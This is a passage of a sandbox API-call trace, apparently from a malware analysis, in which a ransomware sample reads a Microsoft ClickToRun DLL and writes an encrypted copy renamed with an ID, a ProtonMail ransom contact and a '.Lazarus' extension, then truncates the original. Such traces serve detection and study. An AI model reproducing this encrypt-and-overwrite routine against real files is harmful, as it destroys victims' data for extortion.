Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0090.585] AreFileApisANSI () returned 1 [0090.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 92 [0090.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0090.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0090.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0090.586] AreFileApisANSI () returned 1 [0090.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0090.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 92 [0090.586] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0090.586] GetFileType (hFile=0x33c) returned 0x1 [0090.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.587] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0090.587] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0090.587] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0090.587] CloseHandle (hObject=0x33c) returned 1 [0090.587] AreFileApisANSI () returned 1 [0090.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0090.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 92 [0090.587] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0090.587] GetFileType (hFile=0x33c) returned 0x1 [0090.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.588] CloseHandle (hObject=0x33c) returned 1 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0090.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0090.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0090.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0090.589] AreFileApisANSI () returned 1 [0090.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0090.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 92 [0090.589] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x5ac0)) returned 1 [0090.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.589] AreFileApisANSI () returned 1 [0090.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0090.590] GetLastError () returned 0x0 [0090.590] SetLastError (dwErrCode=0x0) [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c058 [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0090.590] GetLastError () returned 0x0 [0090.590] SetLastError (dwErrCode=0x0) [0090.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x5f798 [0090.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0090.590] AreFileApisANSI () returned 1 [0090.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0090.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x134) returned 0x4e568 [0090.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f798, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=154 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 154 [0090.590] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0090.591] GetFileType (hFile=0x33c) returned 0x1 [0090.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0090.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0090.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0090.591] AreFileApisANSI () returned 1 [0090.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0090.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 92 [0090.591] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.591] GetFileType (hFile=0x360) returned 0x1 [0090.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0090.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0090.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0090.592] GetLastError () returned 0x0 [0090.592] SetLastError (dwErrCode=0x0) [0090.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0090.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0090.592] GetLastError () returned 0x0 [0090.592] SetLastError (dwErrCode=0x0) [0090.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0090.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0090.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0090.592] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0090.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0090.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0090.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0090.603] GetLastError () returned 0x0 [0090.603] SetLastError (dwErrCode=0x0) [0090.603] GetLastError () returned 0x0 [0090.603] SetLastError (dwErrCode=0x0) [0090.603] GetLastError () returned 0x0 [0090.603] SetLastError (dwErrCode=0x0) [0090.603] GetLastError () returned 0x0 [0090.603] SetLastError (dwErrCode=0x0) [0090.604] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.622] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.624] GetLastError () returned 0x0 [0090.624] SetLastError (dwErrCode=0x0) [0090.624] GetLastError () returned 0x0 [0090.624] SetLastError (dwErrCode=0x0) [0090.624] GetLastError () returned 0x0 [0090.624] SetLastError (dwErrCode=0x0) [0090.624] GetLastError () returned 0x0 [0090.625] SetLastError (dwErrCode=0x0) [0090.625] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.625] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.625] GetLastError () returned 0x0 [0090.625] SetLastError (dwErrCode=0x0) [0090.625] GetLastError () returned 0x0 [0090.625] SetLastError (dwErrCode=0x0) [0090.626] GetLastError () returned 0x0 [0090.626] SetLastError (dwErrCode=0x0) [0090.626] GetLastError () returned 0x0 [0090.626] SetLastError (dwErrCode=0x0) [0090.626] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.626] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.626] GetLastError () returned 0x0 [0090.626] SetLastError (dwErrCode=0x0) [0090.626] GetLastError () returned 0x0 [0090.626] SetLastError (dwErrCode=0x0) [0090.626] GetLastError () returned 0x0 [0090.626] SetLastError (dwErrCode=0x0) [0090.627] GetLastError () returned 0x0 [0090.627] SetLastError (dwErrCode=0x0) [0090.627] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.627] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.627] GetLastError () returned 0x0 [0090.627] SetLastError (dwErrCode=0x0) [0090.627] GetLastError () returned 0x0 [0090.627] SetLastError (dwErrCode=0x0) [0090.627] GetLastError () returned 0x0 [0090.627] SetLastError (dwErrCode=0x0) [0090.627] GetLastError () returned 0x0 [0090.627] SetLastError (dwErrCode=0x0) [0090.628] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0xac0, lpOverlapped=0x0) returned 1 [0090.628] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.628] GetLastError () returned 0x0 [0090.628] SetLastError (dwErrCode=0x0) [0090.628] GetLastError () returned 0x0 [0090.628] SetLastError (dwErrCode=0x0) [0090.628] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0090.628] GetLastError () returned 0x0 [0090.628] SetLastError (dwErrCode=0x0) [0090.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0090.629] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327ef70*=0xac0, lpOverlapped=0x0) returned 1 [0090.629] GetLastError () returned 0x0 [0090.629] SetLastError (dwErrCode=0x0) [0090.629] GetLastError () returned 0x0 [0090.629] SetLastError (dwErrCode=0x0) [0090.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0090.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0090.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0090.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0090.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0090.629] CloseHandle (hObject=0x33c) returned 1 [0090.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0090.631] CloseHandle (hObject=0x360) returned 1 [0090.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0090.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0090.631] AreFileApisANSI () returned 1 [0090.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0090.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 92 [0090.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.632] GetFileType (hFile=0x360) returned 0x1 [0090.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0090.633] GetLastError () returned 0xb7 [0090.633] SetLastError (dwErrCode=0xb7) [0090.633] WriteFile (in: hFile=0x360, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0090.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0090.634] CloseHandle (hObject=0x360) returned 1 [0090.634] AreFileApisANSI () returned 1 [0090.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0090.634] MultiByteToWideChar (in: 